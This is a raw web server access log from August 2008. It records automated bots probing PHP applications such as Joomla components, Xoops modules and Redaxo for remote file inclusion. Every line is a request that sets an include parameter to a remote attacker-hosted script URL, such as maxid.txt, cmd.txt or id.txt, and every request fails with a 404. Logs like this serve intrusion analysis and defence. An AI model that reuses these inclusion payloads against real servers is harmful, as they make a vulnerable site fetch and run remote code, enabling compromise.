69.73.189.205 - - [10/Aug/2008:18:29:24 -0600] "GET /logs/access_log.20080622/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:29:24 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:29:24 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:29:24 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:29:24 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:18:29:45 -0600] "GET /logs/access_log.20080622/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:29:46 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:29:46 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:30:08 -0600] "GET /logs/error_log.20080601/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:18:30:21 -0600] "GET /logs/access_log.20080413/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:30:22 -0600] "GET /logs/access_log.20080413/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
125.24.33.188 - - [10/Aug/2008:18:31:13 -0600] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
125.24.33.188 - - [10/Aug/2008:18:31:14 -0600] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:18:31:21 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:31:21 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:31:21 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:31:21 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:31:21 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:31:21 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
125.24.33.188 - - [10/Aug/2008:18:31:28 -0600] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
125.24.33.188 - - [10/Aug/2008:18:31:30 -0600] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:31:30 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:31:31 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:31:31 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
210.188.205.31 - - [10/Aug/2008:18:31:33 -0600] "GET /logs/access_log.20080622/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:31:34 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:31:34 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
64.49.254.139 - - [10/Aug/2008:18:31:41 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:31:41 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:31:41 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:18:31:43 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:31:43 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:18:31:56 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:32:01 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
210.188.205.31 - - [10/Aug/2008:18:32:14 -0600] "GET /logs/error_log.20080601/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
66.230.197.245 - - [10/Aug/2008:18:33:23 -0600] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:18:33:23 -0600] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
64.49.254.139 - - [10/Aug/2008:18:34:30 -0600] "GET /logs/error_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
210.188.205.31 - - [10/Aug/2008:18:34:40 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:34:41 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:34:41 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:35:04 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:35:20 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:35:20 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:35:20 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
151.1.210.219 - - [10/Aug/2008:18:35:20 -0600] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
210.188.205.31 - - [10/Aug/2008:18:35:29 -0600] "GET /logs/error_log/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:35:30 -0600] "GET /common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:35:30 -0600] "GET /logs/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
66.230.197.245 - - [10/Aug/2008:18:35:33 -0600] "GET /logs/error_log.20080420/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:18:35:34 -0600] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
210.188.205.31 - - [10/Aug/2008:18:35:57 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
217.20.89.210 - - [10/Aug/2008:18:36:05 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
66.230.197.245 - - [10/Aug/2008:18:37:37 -0600] "GET /logs/access_log.20080420/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 277 "-" "libwww-perl/5.810"
124.217.242.2 - - [10/Aug/2008:18:40:45 -0600] "GET /logs/error_log.20080615//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
219.117.239.114 - - [10/Aug/2008:18:41:14 -0600] "GET /logs/error_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:18:41:15 -0600] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:18:41:15 -0600] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
89.111.172.23 - - [10/Aug/2008:18:41:38 -0600] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:18:42:45 -0600] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:42:45 -0600] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
207.44.244.37 - - [10/Aug/2008:18:43:07 -0600] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 244 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
207.44.244.37 - - [10/Aug/2008:18:43:07 -0600] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
195.85.130.159 - - [10/Aug/2008:18:43:23 -0600] "GET /add.php?snake=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
195.85.130.159 - - [10/Aug/2008:18:43:23 -0600] "GET /logs/add.php?snake=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
66.230.197.245 - - [10/Aug/2008:18:43:47 -0600] "GET /logs/access_log.20080420/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 273 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:18:43:47 -0600] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:18:43:47 -0600] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:18:43:48 -0600] "GET /logs/error_log.20080420/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
81.169.158.65 - - [10/Aug/2008:18:45:03 -0600] "GET /logs/access_log.20080420/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:45:03 -0600] "GET /errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:45:03 -0600] "GET /logs/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
125.24.33.188 - - [10/Aug/2008:18:46:04 -0600] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
125.24.33.188 - - [10/Aug/2008:18:46:05 -0600] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
81.169.158.65 - - [10/Aug/2008:18:46:57 -0600] "GET /logs/error_log.20080420/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:18:47:23 -0600] "GET /logs/access_log.20080706//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:18:47:24 -0600] "GET //include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:18:47:24 -0600] "GET /logs//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
89.111.172.23 - - [10/Aug/2008:18:48:40 -0600] "GET /logs/access_log.20080706//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:18:48:40 -0600] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
151.1.210.219 - - [10/Aug/2008:18:49:05 -0600] "GET /logs/access_log.20080706//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
151.1.210.219 - - [10/Aug/2008:18:49:05 -0600] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
125.24.33.188 - - [10/Aug/2008:18:50:23 -0600] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
125.24.33.188 - - [10/Aug/2008:18:50:24 -0600] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
151.1.210.219 - - [10/Aug/2008:18:51:16 -0600] "GET /logs/access_log.20080713//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
195.5.163.212 - - [10/Aug/2008:18:51:56 -0600] "GET /logs/error_log.20080601//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:18:51:57 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.5.163.212 - - [10/Aug/2008:18:51:57 -0600] "GET /logs/access_log.20080601//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:18:52:04 -0600] "GET /logs/access_log.20080330//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
210.245.226.25 - - [10/Aug/2008:18:52:10 -0600] "GET /logs/access_log.20080330//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
69.72.153.58 - - [10/Aug/2008:18:52:21 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.72.153.58 - - [10/Aug/2008:18:52:21 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.72.153.58 - - [10/Aug/2008:18:56:50 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.72.153.58 - - [10/Aug/2008:18:56:51 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.72.153.58 - - [10/Aug/2008:18:57:17 -0600] "GET /logs/classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
69.72.153.58 - - [10/Aug/2008:18:57:18 -0600] "GET /classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
66.230.197.245 - - [10/Aug/2008:18:58:25 -0600] "GET /logs/error_log.20080406/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
202.70.83.4 - - [10/Aug/2008:19:00:07 -0600] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
67.15.205.17 - - [10/Aug/2008:19:00:32 -0600] "GET /logs/error_log.20080406//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.811"
67.15.205.17 - - [10/Aug/2008:19:00:32 -0600] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
67.15.205.17 - - [10/Aug/2008:19:00:32 -0600] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
219.117.239.114 - - [10/Aug/2008:19:03:35 -0600] "GET /logs/access_log.20080601//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:19:03:39 -0600] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
66.230.197.245 - - [10/Aug/2008:19:03:40 -0600] "GET /logs/error_log/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
219.117.239.114 - - [10/Aug/2008:19:03:40 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.19.51.194 - - [10/Aug/2008:19:04:11 -0600] "GET /logs/error_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
